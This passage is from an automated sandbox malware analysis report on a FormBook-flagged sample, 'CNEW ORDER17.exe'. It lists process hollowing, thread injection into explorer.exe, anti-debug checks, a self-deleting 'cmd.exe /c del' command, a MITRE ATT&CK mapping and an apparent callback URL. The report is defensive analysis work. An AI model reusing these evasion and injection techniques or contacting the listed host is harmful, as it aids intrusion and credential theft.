          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A3884 mov eax, dword ptr fs:[00000030h]18_2_044A3884
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A3884 mov eax, dword ptr fs:[00000030h]18_2_044A3884
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044690AF mov eax, dword ptr fs:[00000030h]18_2_044690AF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445F0BF mov ecx, dword ptr fs:[00000030h]18_2_0445F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445F0BF mov eax, dword ptr fs:[00000030h]18_2_0445F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445F0BF mov eax, dword ptr fs:[00000030h]18_2_0445F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444B944 mov eax, dword ptr fs:[00000030h]18_2_0444B944
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444B944 mov eax, dword ptr fs:[00000030h]18_2_0444B944
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04463D43 mov eax, dword ptr fs:[00000030h]18_2_04463D43
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A3540 mov eax, dword ptr fs:[00000030h]18_2_044A3540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04447D50 mov eax, dword ptr fs:[00000030h]18_2_04447D50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442B171 mov eax, dword ptr fs:[00000030h]18_2_0442B171
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442B171 mov eax, dword ptr fs:[00000030h]18_2_0442B171
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444C577 mov eax, dword ptr fs:[00000030h]18_2_0444C577
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444C577 mov eax, dword ptr fs:[00000030h]18_2_0444C577
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429100 mov eax, dword ptr fs:[00000030h]18_2_04429100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429100 mov eax, dword ptr fs:[00000030h]18_2_04429100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429100 mov eax, dword ptr fs:[00000030h]18_2_04429100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04444120 mov eax, dword ptr fs:[00000030h]18_2_04444120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04444120 mov eax, dword ptr fs:[00000030h]18_2_04444120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04444120 mov eax, dword ptr fs:[00000030h]18_2_04444120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04444120 mov eax, dword ptr fs:[00000030h]18_2_04444120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04444120 mov ecx, dword ptr fs:[00000030h]18_2_04444120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442AD30 mov eax, dword ptr fs:[00000030h]18_2_0442AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04433D34 mov eax, dword ptr fs:[00000030h]18_2_04433D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8D34 mov eax, dword ptr fs:[00000030h]18_2_044F8D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044AA537 mov eax, dword ptr fs:[00000030h]18_2_044AA537
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04454D3B mov eax, dword ptr fs:[00000030h]18_2_04454D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04454D3B mov eax, dword ptr fs:[00000030h]18_2_04454D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04454D3B mov eax, dword ptr fs:[00000030h]18_2_04454D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445513A mov eax, dword ptr fs:[00000030h]18_2_0445513A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445513A mov eax, dword ptr fs:[00000030h]18_2_0445513A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442B1E1 mov eax, dword ptr fs:[00000030h]18_2_0442B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442B1E1 mov eax, dword ptr fs:[00000030h]18_2_0442B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442B1E1 mov eax, dword ptr fs:[00000030h]18_2_0442B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044D8DF1 mov eax, dword ptr fs:[00000030h]18_2_044D8DF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445A185 mov eax, dword ptr fs:[00000030h]18_2_0445A185
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444C182 mov eax, dword ptr fs:[00000030h]18_2_0444C182
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445FD9B mov eax, dword ptr fs:[00000030h]18_2_0445FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445FD9B mov eax, dword ptr fs:[00000030h]18_2_0445FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044535A1 mov eax, dword ptr fs:[00000030h]18_2_044535A1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429240 mov eax, dword ptr fs:[00000030h]18_2_04429240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429240 mov eax, dword ptr fs:[00000030h]18_2_04429240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429240 mov eax, dword ptr fs:[00000030h]18_2_04429240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429240 mov eax, dword ptr fs:[00000030h]18_2_04429240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DB260 mov eax, dword ptr fs:[00000030h]18_2_044DB260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DB260 mov eax, dword ptr fs:[00000030h]18_2_044DB260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8A62 mov eax, dword ptr fs:[00000030h]18_2_044F8A62
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443766D mov eax, dword ptr fs:[00000030h]18_2_0443766D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446927A mov eax, dword ptr fs:[00000030h]18_2_0446927A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442C600 mov eax, dword ptr fs:[00000030h]18_2_0442C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442C600 mov eax, dword ptr fs:[00000030h]18_2_0442C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442C600 mov eax, dword ptr fs:[00000030h]18_2_0442C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04443A1C mov eax, dword ptr fs:[00000030h]18_2_04443A1C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442E620 mov eax, dword ptr fs:[00000030h]18_2_0442E620
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DFE3F mov eax, dword ptr fs:[00000030h]18_2_044DFE3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04468EC7 mov eax, dword ptr fs:[00000030h]18_2_04468EC7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044536CC mov eax, dword ptr fs:[00000030h]18_2_044536CC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DFEC0 mov eax, dword ptr fs:[00000030h]18_2_044DFEC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8ED6 mov eax, dword ptr fs:[00000030h]18_2_044F8ED6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044376E2 mov eax, dword ptr fs:[00000030h]18_2_044376E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044516E0 mov ecx, dword ptr fs:[00000030h]18_2_044516E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BFE87 mov eax, dword ptr fs:[00000030h]18_2_044BFE87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445D294 mov eax, dword ptr fs:[00000030h]18_2_0445D294
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445D294 mov eax, dword ptr fs:[00000030h]18_2_0445D294
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F0EA5 mov eax, dword ptr fs:[00000030h]18_2_044F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F0EA5 mov eax, dword ptr fs:[00000030h]18_2_044F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F0EA5 mov eax, dword ptr fs:[00000030h]18_2_044F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A46A7 mov eax, dword ptr fs:[00000030h]18_2_044A46A7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443AAB0 mov eax, dword ptr fs:[00000030h]18_2_0443AAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443AAB0 mov eax, dword ptr fs:[00000030h]18_2_0443AAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445FAB0 mov eax, dword ptr fs:[00000030h]18_2_0445FAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442DB40 mov eax, dword ptr fs:[00000030h]18_2_0442DB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443EF40 mov eax, dword ptr fs:[00000030h]18_2_0443EF40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8B58 mov eax, dword ptr fs:[00000030h]18_2_044F8B58
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442F358 mov eax, dword ptr fs:[00000030h]18_2_0442F358
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442DB60 mov ecx, dword ptr fs:[00000030h]18_2_0442DB60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443FF60 mov eax, dword ptr fs:[00000030h]18_2_0443FF60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8F6A mov eax, dword ptr fs:[00000030h]18_2_044F8F6A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04453B7A mov eax, dword ptr fs:[00000030h]18_2_04453B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04453B7A mov eax, dword ptr fs:[00000030h]18_2_04453B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F070D mov eax, dword ptr fs:[00000030h]18_2_044F070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F070D mov eax, dword ptr fs:[00000030h]18_2_044F070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E131B mov eax, dword ptr fs:[00000030h]18_2_044E131B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BFF10 mov eax, dword ptr fs:[00000030h]18_2_044BFF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BFF10 mov eax, dword ptr fs:[00000030h]18_2_044BFF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04424F2E mov eax, dword ptr fs:[00000030h]18_2_04424F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04424F2E mov eax, dword ptr fs:[00000030h]18_2_04424F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445E730 mov eax, dword ptr fs:[00000030h]18_2_0445E730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E138A mov eax, dword ptr fs:[00000030h]18_2_044E138A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04431B8F mov eax, dword ptr fs:[00000030h]18_2_04431B8F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04431B8F mov eax, dword ptr fs:[00000030h]18_2_04431B8F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DD380 mov ecx, dword ptr fs:[00000030h]18_2_044DD380
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445B390 mov eax, dword ptr fs:[00000030h]18_2_0445B390
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7794 mov eax, dword ptr fs:[00000030h]18_2_044A7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7794 mov eax, dword ptr fs:[00000030h]18_2_044A7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7794 mov eax, dword ptr fs:[00000030h]18_2_044A7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F5BA5 mov eax, dword ptr fs:[00000030h]18_2_044F5BA5
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0040ACD0 LdrLoadDll,15_2_0040ACD0
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: C0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'Jump to behavior
          Source: explorer.exe, 00000010.00000000.495329240.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000010.00000000.448733880.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000010.00000000.495329240.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000010.00000000.495329240.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000010.00000000.495329240.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000010.00000000.455828193.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeQueries volume information: C:\Users\user\Desktop\CNEW ORDER17.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection412Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection412LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          CNEW ORDER17.exe100%AviraHEUR/AGEN.1142543
          CNEW ORDER17.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe100%AviraHEUR/AGEN.1142543
          C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.CNEW ORDER17.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1142543Download File
          15.2.CNEW ORDER17.exe.4d0000.1.unpack100%AviraHEUR/AGEN.1142543Download File
          15.0.CNEW ORDER17.exe.4d0000.0.unpack100%AviraHEUR/AGEN.1142543Download File
          15.2.CNEW ORDER17.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.CNEW ORDER17.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1142543Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.cursoukulelegospel.com/h0c4/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.cursoukulelegospel.com/h0c4/true
          • Avira URL Cloud: safe
          		low

          Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:502245
          Start date:13.10.2021
          Start time:18:34:34
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 44s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:CNEW ORDER17.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:23
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/3@0/0
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 44% (good quality ratio 39.1%)
          • Quality average: 68.5%
          • Quality standard deviation: 33.4%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 56
          • Number of non-executed functions: 95
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
